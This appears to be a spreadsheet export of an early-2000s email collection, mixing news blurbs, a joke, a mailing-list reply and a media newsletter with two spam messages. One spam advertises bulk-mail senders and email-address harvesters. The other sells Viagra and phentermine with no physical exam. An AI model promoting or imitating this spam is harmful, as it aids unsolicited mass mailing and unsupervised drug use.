     handshake and sort of rub their shoulders and say, "Hey, great to see you. 
     You're my new best friend for the next five minutes." 
     GROTH: Basically act like a used car salesman. 
     RALL: It's exactly like that! You always carry cigarettes. You offer them a 
     cigarette, and you say, "Hey, what's goin' on? How's it goin'? Great. 
     Here's my documents. How's the road?" Just small talk, because these guys 
     are bored. They're in the middle of nowhere, and you're sometimes the only 
     vehicle they've seen for many hours. They're often very drunk, so you just 
     have to be cool.  
 Link[1] Discuss[2]
 [1] http://www.tcj.com/247/i_rall.html
 [2] http://www.quicktopic.com/16/H/de7BfPnMekg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Monster molecule techniques win Chemistry Nobel
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8701110,1440/
 Date: Not supplied
 Three researchers are honoured for pioneering ways of identifying large 
 biological molecules such as proteins and DNA
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Beer Scooter
</t>
  </si>
  <si>
    <t xml:space="preserve">
 [I'm sure somebody will tell me about the original source; it's in a
 number of places on the web. -gkm]
 Forwarded-by: Colin Burgess &lt;cburgess@qnx.com&gt;
 The Beer Scooter 
 How many times have you woken up in the morning after a hard night
 drinking and thought 'How on earth did I get home? As hard as you
 try, you cannot piece together your return journey from the pub to
 your house. The answer to this puzzle is that you used a Beer
 Scooter.
 The Beer Scooter is a mythical form of transport, owned and leased
 to the drunk by Bacchus the Roman god of wine. Bacchus has branched
 out since the decrease in the worship of the Roman Pantheon and
 has bought a large batch of these magical devices. The Beer Scooter
 works in the following fashion:-
 The passenger reaches a certain level of drunkenness and the
 "slurring gland" begins to give off a pheromone. Bacchus or one of
 his many sub-contractors detects this pheromone and sends down a
 winged Beer Scooter. The scooter scoops up the passenger and deposits
 them in their bedroom via the Trans-Dimensional Portal. This is
 not cheap to run, so a large portion of the passenger's in-pocket
 cash is taken as payment.
 This answers the second question after a night out 'How did I spend
 so much money?'
 Unfortunately, Beer Scooters have a poor safety record and are
 thought to be responsible for over 90% of all UDI (Unidentified
 Drinking Injuries).  An undocumented feature of the beer scooter
 is the destruction of time segments during the trip. The nature of
 Trans-Dimensional Portals dictates that time will be lost, seemingly
 unaccounted for.
 This answers a third question after a night out 'What the hell
 happened?'
 With good intentions, Bacchus opted for the REMIT (Removal of
 Embarrassing Moments In Time) add on, that automatically removes,
 in descending order, those parts in time regretted most. Unfortunately
 one person's REMIT is not necessarily the REMIT of another and
 quite often lost time is regained in discussions over a period of
 time. Independent studies have also shown that Beer Goggles often
 cause the scooter's navigation system to malfunction thus sending
 the passenger to the wrong bedroom, often with horrific consequences.
 With recent models including a GPS, Bacchus made an investment in
 a scooter drive-thru chain specialising in half eaten kebabs and
 pizza crusts.
 Another question answered!! For the family man, Beer Scooters come
 equipped with flowers picked from other people's garden and
 Thump-A-Lot boots (Patent Pending). These boots are designed in
 such a way that no matter how quietly you tip-toe up the stairs,
 you are sure to wake up your other half. Special anti-gravity
 springs ensure that you bump into every wall in the house and the
 CTSGS (Coffee Table Seeking Guidance System) explains the bruised
 shins. The final add-on Bacchus saw fit to invest in for some
 scooters is the TAS (Tobacco Absorption System). This explains how
 one person can apparently get through 260 Marlboro Lights in a
 single night.
 PS: Don't forget the on-board heater, which allows you to comfortably
 get home from the pub in sub-zero temperatures, wearing just a
 T-shirt.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div&gt;
   &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div&gt;
 &lt;/div&gt;
 &lt;div&gt;
   &lt;strong&gt;&lt;font color="#ff0080" size="4" face="Arial"&gt;Direct Email Blaster&lt;/font&gt;&lt;/strong&gt; 
 &lt;/div&gt; 
 &lt;font size="2"&gt; 
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;b&gt;&lt;font color="#006600"&gt;&lt;i&gt;The program will send mail at the  
 rate of over 1, 000 e-mails per minute.&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;br&gt; 
 Legal and Fast sending bulk emails&amp;nbsp;&lt;br&gt; 
 &lt;font color="#006600"&gt;&lt;i&gt;Built in SMTP server&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;br&gt; 
 Have Return Path&amp;nbsp;&lt;br&gt; 
 Can Check Mail Address&amp;nbsp;&lt;br&gt; 
 &lt;font color="#006600"&gt;&lt;i&gt;Make Error Send Address List( Remove or Send Again)&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;br&gt; 
 Support multi-threads.&amp;nbsp;&lt;br&gt; 
 Support multi-smtp servers.&amp;nbsp;&lt;br&gt; 
 Manages your opt-in E-Mail Lists&amp;nbsp;&lt;br&gt; 
 Offers an easy-to-use interface!&amp;nbsp;&lt;br&gt; 
 Easy to confige and use&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;a href="http://www.wldinfo.com/bj_download/edeb_set.zip"&gt;&lt;strong&gt;Download  
 Now&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;strong&gt;&lt;font color="#ff0080" size="4" face="Arial"&gt;Maillist Verify&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;font face="Arial"&gt;Maillist Verify is intended for e-mail addresses and mail  
 lists verifying. The main task is to determine which of addresses in the mail  
 list are dead. The program is oriented, basically, on programmers which have  
 their own mail lists to inform their users about new versions of their programs.&lt;/font&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;font face="Arial"&gt;The program works on the same algorithm as ISP mail  
 systems do. Mail servers addresses for specified address are extracted from DNS.  
 The program tries to connect with found SMTP-servers and simulates the sending  
 of message. It does not come to the message &lt;nobr&gt;sending &amp;#8255;/NOBR&amp;gt; EMV  
 disconnect as soon as mail server informs does this address exist or not. EMV  
 can find about 90% of dead addresses &amp;#8255;/NOBR&amp;gt; some mail systems receive  
 all messages and only then see their addresses and if the address is dead send  
 the message back with remark about it.&lt;/nobr&gt;&lt;/font&gt;&lt;/p&gt; 
 &lt;nobr&gt; 
 &lt;p&gt;&lt;a href="http://www.wldinfo.com/bj_download/bemv_set.zip"&gt;&lt;strong&gt;&lt;font size="3" face="Arial"&gt;Download  
 Now&lt;/font&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;strong&gt;&lt;font color="#ff0080" size="4" face="Arial"&gt;Express Email Blaster&amp;nbsp;&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;font face="Arial"&gt;Express Email Blaster&amp;nbsp; is a very fast, powerful yet  
 simple to use email sender. Utilizing multiple threads/connections and multiple  
 SMTP servers your emails will be sent out fast and easily. There are User  
 Information, Attach Files, Address and Mail Logs four tabbed area for the  
 E-mails details for sending. About 25 SMTP servers come with the demo version,  
 and users may Add and Delete SMTP servers. About &lt;font color="#008000"&gt;&lt;b&gt;60,000&lt;/b&gt;&lt;/font&gt;  
 E-mails will be sent out per hour.&amp;quot;&lt;/font&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://www.wldinfo.com/bj_download/beeb_set.zip"&gt;&lt;font size="3" face="Arial"&gt;Download  
 Now&lt;/font&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;strong&gt;&lt;font color="#ff0080" size="4" face="Arial"&gt;Express Email Address  
 Extractor&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt; 
 &lt;font size="4"&gt; 
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="3" color="#008000"&gt;This program is the  
 most efficient, easy to use email address collector available on the internet! &lt;/font&gt;&lt;font color="#000000" size="3"&gt;Beijing  
 Express Email Address Extractor (ExpressEAE) is designed to extract e-mail  
 addresses from web-pages on the Internet (using HTTP protocols) .ExpressEAE  
 supports operation through many proxy-server and works very fast, as it is able  
 of loading several pages simultaneously, and requires very few resources.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#000000" face="Arial"&gt;&lt;font size="3"&gt;With  
 it, you will be able to&lt;/font&gt;&lt;font size="2"&gt; &lt;/font&gt;&lt;font size="3"&gt;use targeted  
 searches to crawl the world wide web, extracting thousands of clean, fresh email  
 addresses. Ably Email address Extractor is unlike other address collecting  
 programs, which limit you to one or two search engines and are unable to do auto  
 searches HUGE address. Most of them collect a high percentage of incomplete,  
 unusable addresses which will cause you serious problems when using them in a  
 mailing.&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
 &lt;ul&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Easier  
     to learn and use than any other email address collector program available.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Accesses  
     eight search engines&amp;nbsp;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Add  
     your own URLs to the list to be searched&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="3" face="Arial"&gt;&lt;font color="#008000"&gt;Supports  
     operation through &lt;/font&gt;&lt;font color="#ff00ff"&gt;a lot of&lt;/font&gt;&lt;font color="#008000"&gt;  
     proxy-server and works very fast (HTTP Proxy)&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Able  
     of loading several pages simultaneously&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Requires  
     very few resources&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Timeout  
     feature allows user to limit the amount of time crawling in dead sites and  
     traps.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="3" face="Arial"&gt;&lt;font color="#008000"&gt;Easy  
     to make &lt;/font&gt;&lt;font color="#ff00ff"&gt;Huge&lt;/font&gt;&lt;font color="#008000"&gt;  
     address list&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Pause/continue  
     extraction at any time.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="3" face="Arial"&gt;Auto  
     connection to the Internet&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;div&gt; 
   &lt;strong&gt;&lt;a href="http://www.wldinfo.com/bj_download/eeae_set.zip"&gt;&lt;font size="3" color="#008000" face="Arial"&gt;Download  
   Now&lt;/font&gt;&lt;/a&gt;&lt;/strong&gt; 
 &lt;/div&gt; 
 &lt;div&gt; 
   &lt;strong&gt;&lt;font color="#ff0080" face="Arial"&gt;Express Email Address Downloader&lt;/font&gt;&lt;/strong&gt; 
 &lt;/div&gt; 
 &lt;ul&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#006600" size="2"&gt;ExpressEAD&amp;nbsp;  
     &lt;/font&gt;&lt;font color="#000000" size="2"&gt;is a 32 bit Windows Program for e-mail  
     marketing. It is intended for easy and convenient search large e-mail  
     address lists from mail servers. The program can be operated on Windows  
     95/98/ME/2000 and NT.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#006600" size="2"&gt;ExpressEAD&amp;nbsp;  
     &lt;/font&gt;&lt;font color="#000000" size="2"&gt;support multi-threads (up to 1024  
     connections).&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#006600" size="2"&gt;ExpressEAD&amp;nbsp;  
     &lt;/font&gt;&lt;font color="#000000" size="2"&gt;has the ability&amp;nbsp; to reconnect to  
     the mail server if the server has disconnected and continue the searching at  
     the point where it has been interrupted.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#006600" size="2"&gt;ExpressEAD&amp;nbsp;  
     &lt;/font&gt;&lt;font color="#000000" size="2"&gt;has an ergonomic interface that is  
     easy to set up and simple to use.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;div&gt; 
   &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt; 
 &lt;/div&gt; 
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font color="#008000" size="4" face="Arial"&gt;Features:&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
 &lt;ul type="disc"&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="2" face="Arial"&gt;support  
     multi-threads.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="2" face="Arial"&gt;auto get smtp  
     server address,support multi-smtp servers.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="2" face="Arial"&gt;auto save&amp;nbsp;  
     E-Mail Lists&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt; 
   &lt;li&gt;&lt;font face="Arial"&gt;&lt;strong&gt;&lt;font size="2" face="Arial"&gt;offers an  
     easy-to-use interface!&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;div&gt; 
   &lt;strong&gt;&lt;a href="http://www.wldinfo.com/bj_download/eead_set.zip"&gt;&lt;font size="3" color="#008000" face="Arial"&gt;Download  
   Now&lt;/font&gt;&lt;/a&gt;&lt;/strong&gt; 
 &lt;/div&gt; 
 &lt;div&gt; 
   &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt; 
 &lt;/div&gt; 
 &lt;div&gt; 
   &lt;strong&gt;&lt;font color="#ff0080" face="Arial"&gt;Express Maillist Manager&lt;/font&gt;&lt;/strong&gt; 
 &lt;/div&gt; 
 &lt;div&gt; 
   &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt; 
 &lt;/div&gt; 
 &lt;div&gt; 
   &lt;font size="2"&gt; 
   &lt;p&gt;&lt;font face="Arial"&gt;&lt;font color="black" size="3"&gt;This program was designed  
   to be a complement to the &lt;/font&gt;&lt;font color="#800080" size="3"&gt;Direct Email  
   Blaster&amp;nbsp; &lt;/font&gt;&lt;font color="black" size="3"&gt;and &lt;/font&gt;&lt;font color="#800080" size="3"&gt;Email  
   Blaster &lt;/font&gt;&lt;font color="black" size="3"&gt;suite of bulk email software  
   programs. Its purpose is to organize your email lists in order to be more  
   effective with your email marketing campaign. Some of its features include:&lt;/font&gt;&lt;/font&gt;&lt;/p&gt; 
   &lt;p&gt;&lt;b&gt;&lt;font color="#008000" face="Arial"&gt;&lt;font size="3"&gt;&amp;#8255;Combine several  
   lists into one file.&lt;/font&gt;&lt;br&gt; 
   &lt;font size="3"&gt;&amp;#8255;Split up larger lists to make them more manageable.&lt;/font&gt;&lt;br&gt; 
   &lt;font size="3"&gt;&amp;#8255;Remove addresses from file.&lt;/font&gt;&lt;br&gt; 
   &lt;font size="3"&gt;&amp;#8255;Manual editing, adding, and deleting of addresses.&lt;/font&gt;&lt;br&gt; 
   &lt;font size="3"&gt;&amp;#8255;Ability to auto clean lists, that is, remove any  
   duplicate or unwanted addresses.&lt;/font&gt;&lt;br&gt; 
   &lt;font size="3"&gt;&amp;#8255;Maintain all your address lists within the program so  
   you no&amp;nbsp; longer need to keep all your lists saved as separate text files.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt; 
   &lt;p&gt;&lt;strong&gt;&lt;a href="http://www.wldinfo.com/bj_download/bemm_set.zip"&gt;&lt;font size="3" color="#008000" face="Arial"&gt;Download  
   Now&lt;/font&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; 
   &lt;p&gt;&lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt;&lt;/p&gt; 
   &lt;p&gt;&lt;/p&gt;
   &lt;div&gt;
     &lt;font face="Arial"&gt;if you want to remove your email, please send email to &lt;a href="mailto:targetemailremoval@btamail.net.cn"&gt;targetemailremoval@btamail.net.cn&lt;/a&gt;&lt;/font&gt; 
   &lt;/div&gt; 
   &lt;div&gt; 
     &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt; 
   &lt;/div&gt; 
   &lt;div&gt; 
     &lt;font face="Arial"&gt;&amp;nbsp;&lt;/font&gt; 
   &lt;/div&gt; 
   &lt;div&gt; 
   &lt;/div&gt;
   &lt;/font&gt;
 &lt;/div&gt;
 &lt;/font&gt;&lt;/nobr&gt;&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;html&gt;&lt;body&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;                                          &lt;br&gt;&lt;a href=                            &gt;                                                                    &lt;/a&gt;&lt;br&gt;                                         &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:
 &gt; 
 &gt; I'd like to aks this on the rpm-zzzlist : Would a new dependency of 250k, the
 &gt; alsa-lib package, for many packages (mplayer, ogle, xine) be a problem for
 &gt; the freshrpms.net packages users? As I really feel like blending ALSA in
 &gt; now, especially since I've just spent some time recompiling alsa-kernel
 &gt; package for all the Psyche kernels!!!
 I don't know a lot about ALSA, but use custom kernels for many of the 
 machines -- would this mean, in order to get mplayer (eg) to work, I'd 
 first have to compile a custom kernel option? or kernel module? Since I 
 wouldn't have your alsa-kernel(??) installed, would that mean alsa-libs 
 and so on won't install?
 (I guess, in short, if it *requires* the shipped kernel to be used, I'd 
 be against --with-alsa as a default?)
 -te
 -- 
 Troy Engel, Systems Engineer
 Cool as the other side of the pillow
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cheap Viagra
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
    &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
    &lt;title&gt;Lowest Viagra Prices Online!&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table COLS=1 WIDTH="538" &gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face="Arial,Helvetica"&gt;We are the largest U.S. Company specializing
 in prescriptions for &lt;b&gt;&lt;font color="#3333FF"&gt;&lt;a href="http://www.1-stopshop.net"&gt;VIAGRA&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;,
 weight loss management and other FDA approved medications.&amp;nbsp;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Arial,Helvetica"&gt;It has never been easier to get &lt;b&gt;&lt;font color="#3366FF"&gt;&lt;a href="http://www.1-stopshop.net"&gt;Viagra&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;.&amp;nbsp;&lt;/font&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;No Physical Exam Necessary!&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;Free online consultation&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;Fully confidential&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;No embarassment&amp;nbsp;&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;No appointments&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;Secure ordering&amp;nbsp;&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;
 &lt;font face="Arial,Helvetica"&gt;Discreet and overnight shipping&amp;nbsp;&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#CC0000"&gt;&lt;a href="http://www.1-stopshop.net"&gt;GUARANTEED
 LOWEST PRICES.&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;BURN FAT AND LOSE WEIGHT FAST WITH
 &lt;a href="http://www.1-stopshop.net"&gt;PHENTERMINE!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;font face="Arial,Helvetica"&gt;&lt;b&gt;&lt;a href="http://www.1-stopshop.net"&gt;Click
 here&lt;/a&gt;&lt;/b&gt; to visit our online pharmacy.&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p&gt;&lt;font face="Arial,Helvetica"&gt;To be excluded from our mailing list, &lt;b&gt;&lt;a href="mailto:removeme99@btamail.net.cn?subject=remove from viagra"&gt;CLICK
 HERE&lt;/a&gt;&lt;/b&gt;.&amp;nbsp; You will then be automatically deleted from future
 mailings.&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 7984gXiC3-748UrBy5l17
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Market Can't Find Its Bottom With Both Hands
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format...
 ------------=_1033478774-12610-4
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 To view this newsletter in full-color, visit:
 http://newsletter.mediaunspun.com/index000021074.cfm
 Media Unspun
 What the Press is Reporting and Why (www.mediaunspun.com)
 -----------------------------------------------------------------
 October 1, 2002
 -----------------------------------------------------------------
 IN THIS ISSUE
 -----------------------------------------------------------------
 * MARKET CAN'T FIND ITS BOTTOM WITH BOTH HANDS
 * WINNICK: HANDS-OFF OR RED-HANDED?
 * OTHER STORIES
 -----------------------------------------------------------------
 EDITOR'S NOTE
 -----------------------------------------------------------------
 Is Media Unspun useful to you? Then pass it on to a colleague.
 The more readers we have, the more successful we'll be. The more 
 successful we are, the more useful we can be to you. Pass it
 on!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MARKET CAN'T FIND ITS BOTTOM WITH BOTH HANDS
 -----------------------------------------------------------------
 Remember when Nasdaq 2500 seemed impossibly low? Welcome back to 
 cruel reality. These days, with few analysts willing to call a
 market bottom, financial reporters outdo each other with dire
 assessments of how bad things are and how much worse they can
 get. Maybe Morrissey should do a concert on Wall Street; the
 self-pity can't get much worse.
 The markets' closing numbers were the same in every city, but
 you wouldn't know it from the headlines. It was the Dow's worst
 monthly performance in four years, said MSNBC. "3rd quarter
 worst for stocks since '87," read the Denver Post, repeating a
 popular figure reached by tallying the Dow and S&amp;P's percentage
 losses. The New York Daily News counted percentage losses for
 the month only and declared it the worst September since 1937.
 Everyone predicted a lousy September 2002, so the phrase
 "self-fulfilling prophecy" does spring to mind. 
 So does the phrase "gloom and doom." "Every day for the last
 three months, the market has erased $73 of wealth, including
 Saturdays, Sundays and holidays, for every person living in the
 United States," said the San Jose Mercury News. "Countless
 investors are starting to wonder if stocks will ever go up
 again," wrote USA Today. In a more plausible statement,
 TheStreet.com's Aaron Task said recent declines "demonstrated
 once again the folly of investors' repeated attempts to pinpoint 
 a bottom" and "disabuse(d) them of the idea that the best time
 to buy is when things look worst, if only because recent history 
 has shown stocks can go from terrible to awful and beyond." 
 OK, breathe. Go read the comics or something. Feeling better?
 Good, because there's more.
 The New York Post, in small enough words for everyone to
 understand, made the public service announcement "Beware!
 October Is A Very Bad Month For The Stock Market." And you
 shouldn't take candy from strangers, either. The Post's John
 Crudele, a market curmudgeon before it was in style, warned,
 "This market is very dangerous, even if things look like they
 couldn't get any worse." Detroit Free Press columnist Susan
 Tompor agreed that "the next round of statements could indeed
 look pretty nasty." 
 We have to agree: the stock market is bad. The economy is bad.
 It's going to get worse before it gets better, and that may take 
 a while. The "bottom" is, technically, zero. Be cautious, yes,
 but don't let the media's bipolar disorder ruin your day. Just
 like dot-coms weren't really a new economy, a bear market isn't
 the end of the world. - Jen Muehlbauer
 No Happy Endings in September 
 http://www.thestreet.com/markets/aarontaskfree/10045171.html
 Bear drags stocks deeply into den
 http://www.usatoday.com/money/markets/us/2002-09-30-bear-bottom_x.htm
 Market's September is worst since 1937 
 http://www.nydailynews.com/business/story/23183p-21985c.html
 Dow posts worst month in 4 years
 http://www.msnbc.com/news/534548.asp
 Market's Worst Quarter Since '87 Crash Limps to a Close
 http://www.nytimes.com/2002/10/01/business/01STOX.html
 For Dow and S&amp;P, Worst Quarter Since '87 
 http://www.washingtonpost.com/wp-dyn/articles/A24961-2002Sep30.html
 3rd quarter worst for stocks since '87 (Denver Post)
 http://tinyurl.com/1q3i
 Market's tumble persists, capping worst three months in 15
 years
 http://www.siliconvalley.com/mld/siliconvalley/4186771.htm
 Stock Market Quarterly Review
 http://online.wsj.com/page/0,,2_0861,00.html
 (Paid subscription required.)
 Beware! October Is A Very Bad Month For The Stock Market 
 http://www.nypost.com/business/58389.htm
 SUSAN TOMPOR: Bad news is, the beating isn't over yet 
 http://www.freep.com/money/business/tompor1_20021001.htm
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 What's Really Going on at Microsoft? Mary Jo Foley delivers
 unmatched reporting and insight with MICROSOFT WATCH.  Track
 initiatives like .Net, Palladium, Longhorn, Trinity, Yukon;
 release dates, competitive moves, people. For a FREE 14-day
 trial subscription:
 https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075
 -----------------------------------------------------------------
 WINNICK: HANDS-OFF OR RED-HANDED?
 -----------------------------------------------------------------
 Former Global Crossing chairman Gary Winnick will appear before
 a Congressional committee today. It won't be pretty. CNN
 predicted he will plead the Fifth. Most other outlets expected
 Winnick to testify.
 Impetus for all the coverage was yesterday's release by the
 House Energy and Commerce Committee of memos indicating that
 Winnick was in the thick of the company's suspect dealmaking. A
 committee spokesman said, "If he tries to portray himself as an
 out-of-the-loop ceremonial chairman, we intend to remind him
 that he is under oath."
 The memo that got most of the attention was one from then-CEO
 Leo Hindery to Winnick in June 2001. Hindery warned in colorful
 language that the company was heading for a fall. The Financial
 Times, Washington Post, and New York Times all ran a quote from
 the memo comparing telcos to salmon. Hindery urged Winnick to
 unload the company -- "without looking like we are shaking our
 bootie all over the world," quoted the two Timeses -- and
 resigned shortly thereafter.
 One little detail from the memos is guaranteed to make Winnick's 
 time under the television lights even more uncomfortable. Among
 the companies he used his influence with, to help close deals,
 was Enron. All the reports mentioned Enron, but the New York
 Times seemed to be alone in noting that Global Crossing never
 completed a deal with the fallen energy giant.
 The Wall Street Journal looked beyond the obviously embarrassing 
 details of the memos to point out that, despite such evidence,
 the gun might not be smoking yet. "Prosecutors would still need
 to prove that he knew the transactions were improper and used
 them mainly as a way of enriching himself by boosting the
 company's stock price artificially," the Journal reporters
 wrote. The AP noted that all of the memos were dated after
 Winnick's last sale of Global Crossing stock, $123 million in
 May 2001.
 Despite his $734 million in stock profits, Gary Winnick was not
 among the five telco executives being sued by New York attorney
 general Eliot Spitzer to return their ill-gotten gains. Is
 Spitzer betting, with the Journal, that Winnick might walk away
 clean? - Keith Dawson
 Global Crossing: What Did Winnick Know?
 http://www.cnn.com/2002/ALLPOLITICS/09/30/time.crossing.tm/
 Winnick Was Told Of Telecom Risks
 http://www.washingtonpost.com/wp-dyn/articles/A24886-2002Sep30.html
 Memo Indicates Global Crossing Chief Knew of Troubles
 http://www.nytimes.com/2002/10/01/business/01GLOB.html
 Global Crossing's Winnick Knew About Swap Deals
 http://online.wsj.com/article/0,,SB1033426396710785953,00.html
 (Paid subscription required)
 Documents show active role by Global Crossing chairman (AP)
 http://www.bayarea.com/mld/mercurynews/business/4187381.htm
 Suit Seeks IPO Profits From Five Executives
 http://www.washingtonpost.com/wp-dyn/articles/A24921-2002Sep30.html
 -----------------------------------------------------------------
 OTHER STORIES
 -----------------------------------------------------------------
 Fund giant Fidelity set to eliminate 1,695 jobs (Boston Globe)
 http://tinyurl.com/1q3h
 AOL Chairman's No. 1 Ally Turns Into His Biggest Foe
 http://www.nytimes.com/2002/10/01/technology/01AOL.html
 More living without benefits: Health insurance given less
 frequently at work  
 http://www.freep.com/money/business/insure30_20020930.htm
 Beware al-Qaida, Branch is on to you (Battle Creek Enquirer)
 http://tinyurl.com/1prs
